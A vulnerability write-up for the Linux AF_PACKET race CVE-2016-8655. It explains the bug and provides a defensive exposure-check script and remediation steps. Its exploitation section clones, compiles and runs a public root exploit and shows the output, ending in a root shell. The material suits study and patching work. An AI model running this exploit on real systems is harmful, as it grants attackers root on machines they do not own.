Description

This vulnerability lets an unprivileged local process execute code in kernel context: an attacker who already holds an ordinary local account can use it to escalate to root. The bug is a race in packet_set_ring() in net/packet/af_packet.c. The ring-buffer setup path reads the socket's packet version while another thread can still change it with setsockopt(PACKET_VERSION), so a ring can be initialised as TPACKET_V3 (which arms a block-retire timer) and then torn down as TPACKET_V1, leaving the timer armed after the socket's memory has been freed. The exploit reclaims that freed memory with a heap spray so that, when the timer fires, the kernel calls a function pointer and argument of the attacker's choosing. Creating an AF_PACKET socket requires CAP_NET_RAW; on kernels with unprivileged user namespaces enabled (the Ubuntu default) any local user can obtain that capability by entering a new user namespace. The upstream fix (commit 84ac7260236a, "packet: fix race condition in packet_set_ring") takes the socket lock around the version read and rejects PACKET_VERSION changes while a ring is mapped.

Note: the exploit ships offsets for older kernels, but they are untested, so be aware that it may crash kernels before 4.4.

Affected versions

The vulnerable code was introduced in the Linux kernel on April 19, 2011 (it first shipped in the 3.2 release) and was fixed on November 30, 2016.

(Note: this does not mean that every Linux kernel released between 2011 and 2016 is affected. Distribution kernels backport fixes under their existing version numbers, so check the specific kernel build rather than the date.)

Linux kernel version < 4.8.13 (upstream; 4.8.13 is the first stable release that contains the fix, and a distribution kernel with a lower version number may already carry the backported patch).
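A quick local pre-check, added here as an example (it is not part of the original post or of the chocobo_root exploit): it compares the running kernel's upstream version against the 3.2 to 4.8.12 vulnerable range, reports whether an unprivileged user can enter a user namespace (the usual way to obtain the CAP_NET_RAW that an AF_PACKET socket needs), and checks whether kernel.modprobe still points at the system modprobe, since exploits of this bug, chocobo_root among them, redirect modprobe_path to run their payload. The version boundaries, the sysctl names and the expected modprobe paths are assumptions of this script, and because distribution kernels backport fixes, "yes" from the version check means "check the changelog", not "exploitable".

```shell
#!/bin/sh
# Added example (not from the original post or from chocobo_root):
# a pre-check for CVE-2016-8655 exposure on the local machine.
# Assumptions: the vulnerable TPACKET_V3 code first shipped in 3.2 and the
# upstream fix in 4.8.13; an ordinary user normally gets the CAP_NET_RAW
# needed for AF_PACKET sockets only through a user namespace; the system
# modprobe lives at /sbin/modprobe (or /usr/sbin/modprobe on usr-merged systems).

# Reduce a `uname -r` string such as "4.4.0-51-generic" to "maj min pat".
kernel_triplet() {
    v=${1%%[!0-9.]*}            # strip from the first char that is not a digit or dot
    IFS=. read -r maj min pat <<EOF
$v
EOF
    pat=${pat%%.*}              # ignore a fourth component such as 4.4.0.1
    printf '%s %s %s\n' "${maj:-0}" "${min:-0}" "${pat:-0}"
}

# Single integer for ordering: maj*1000000 + min*1000 + pat.
ver_code() {
    set -- $(kernel_triplet "$1")
    echo $(( $1 * 1000000 + $2 * 1000 + $3 ))
}

# "yes" if the upstream version lies in the vulnerable range [3.2, 4.8.13).
# Distribution kernels backport fixes, so "yes" means "check the changelog".
upstream_vulnerable() {
    c=$(ver_code "$1")
    if [ "$c" -ge "$(ver_code 3.2)" ] && [ "$c" -lt "$(ver_code 4.8.13)" ]; then
        echo yes
    else
        echo no
    fi
}

# "yes" if an ordinary user can create a user namespace and thereby obtain
# CAP_NET_RAW for an AF_PACKET socket; "unknown" if neither knob is readable.
unpriv_userns_enabled() {
    if [ -r /proc/sys/kernel/unprivileged_userns_clone ]; then
        # Debian/Ubuntu-specific knob (the one present on the Ubuntu 4.4 kernel in this writeup)
        [ "$(cat /proc/sys/kernel/unprivileged_userns_clone)" -eq 1 ] && echo yes || echo no
    elif [ -r /proc/sys/user/max_user_namespaces ]; then
        # upstream knob since 4.9: 0 disables user namespaces entirely
        [ "$(cat /proc/sys/user/max_user_namespaces)" -gt 0 ] && echo yes || echo no
    else
        echo unknown
    fi
}

# "yes" if kernel.modprobe (the sysctl view of modprobe_path) no longer points
# at the system modprobe, a common footprint of modprobe_path-overwrite exploits.
modprobe_path_suspicious() {
    case "$1" in
        /sbin/modprobe|/usr/sbin/modprobe) echo no ;;
        *) echo yes ;;
    esac
}

main() {
    r=$(uname -r)
    echo "kernel $r: in upstream vulnerable range: $(upstream_vulnerable "$r")"
    echo "unprivileged user namespaces: $(unpriv_userns_enabled)"
    mp=$(cat /proc/sys/kernel/modprobe 2>/dev/null || echo unreadable)
    echo "kernel.modprobe=$mp suspicious: $(modprobe_path_suspicious "$mp")"
}

main "$@"
```

Run it as the unprivileged user you are assessing; a root-only reading of the sysctls would miss the point, since the question is what an ordinary account can reach. The modprobe check is only meaningful after a suspected compromise: on a clean system it should always print "no".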

Exploitation

Check the kernel version and the current user:

$ cat /etc/issue
Ubuntu 20.04.3 LTS \n \l

$ uname -a
Linux 6fdeca8326ab 4.4.0-51-generic #72-Ubuntu SMP Thu Nov 24 18:29:54 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
$ id
uid=1001(test) gid=1001(test) groups=1001(test)

Note the mismatch: /etc/issue reports Ubuntu 20.04, which ships a 5.4 kernel, while uname reports 4.4.0-51. The hostname (6fdeca8326ab) has the form Docker gives a container, and inside a container /etc/issue describes the image's userland while uname reports the host kernel. For a kernel exploit only the uname output matters.

Download and compile the PoC.

PoC: https://github.com/LakshmiDesai/CVE-2016-8655

$ git clone https://github.com/LakshmiDesai/CVE-2016-8655
$ cd CVE-2016-8655
$ gcc chocobo_root.c -o chocobo_root -lpthread

(git clone creates a directory named CVE-2016-8655; the CVE-2016-8655-master name seen in the shell prompts below is what GitHub's ZIP download produces.)

Run the PoC to obtain root. Each "new exploit attempt" in the output is one try at winning the race; "race not won" followed by "retrying stage.." is normal. The exploit works in two stages: stage 1 wins the race to have the hijacked timer call set_memory_rw() on the vsyscall page, turning it into writable kernel memory; stage 2 wins it again to call register_sysctl_table() on a fake table placed in that page, whose proc_dostring handler exposes modprobe_path. Writing a path through the new sysctl and then triggering modprobe makes the kernel run the attacker's binary as root. Do not interrupt the process while it is waiting for the timer: the pending timer callback is what has been hijacked, and killing the process before it fires leaves the kernel executing through freed memory and hangs it.

$ ./chocobo_root 
linux AF_PACKET race condition exploit by rebel
kernel version: 4.4.0-51-generic #72
proc_dostring = 0xffffffff81088090
modprobe_path = 0xffffffff81e48f80
register_sysctl_table = 0xffffffff812879a0
set_memory_rw = 0xffffffff8106f320
exploit starting
making vsyscall page writable..

new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 204517, last val = 0)
current packet version = 2
pbd->hdr.bh1.offset_to_first_pkt = 48
race not won

retrying stage..
new exploit attempt starting, jumping to 0xffffffff8106f320, arg=0xffffffffff600000
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 105697, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying.......
vsyscall page altered!


stage 1 completed
registering new sysctl..

new exploit attempt starting, jumping to 0xffffffff812879a0, arg=0xffffffffff600850
sockets allocated
removing barrier and spraying..
version switcher stopping, x = -1 (y = 125059, last val = 2)
current packet version = 0
pbd->hdr.bh1.offset_to_first_pkt = 48
*=*=*=* TPACKET_V1 && offset_to_first_pkt != 0, race won *=*=*=*
please wait up to a few minutes for timer to be executed. if you ctrl-c now the kernel will hang. so don't do that.
closing socket and verifying.......
sysctl added!

stage 2 completed
binary executed by kernel, launching rootshell
root@wuala:/opt/CVE-2016-8655-master# id
uid=0(root) gid=0(root) groups=0(root),1001(test)
root@wuala:/opt/CVE-2016-8655-master# whoami
root
root@wuala:/opt/CVE-2016-8655-master#

Remediation

Upgrade to a kernel that contains the fix: upstream 4.8.13 or later, or your distribution's patched build of an older branch (the fix was widely backported, so a 4.4.x distribution kernel may already be safe; check the package changelog rather than the version number). Until the kernel is updated, the bug is reachable only by a process that can create AF_PACKET sockets, i.e. one holding CAP_NET_RAW. Disabling unprivileged user namespaces (on Debian/Ubuntu kernels, sysctl kernel.unprivileged_userns_clone=0) removes the usual way an ordinary user obtains that capability, and where af_packet is built as a module rather than into the kernel, preventing it from loading (install af_packet /bin/true in a modprobe.d file) removes the attack surface entirely, at the cost of breaking tools such as tcpdump and DHCP clients that rely on it.
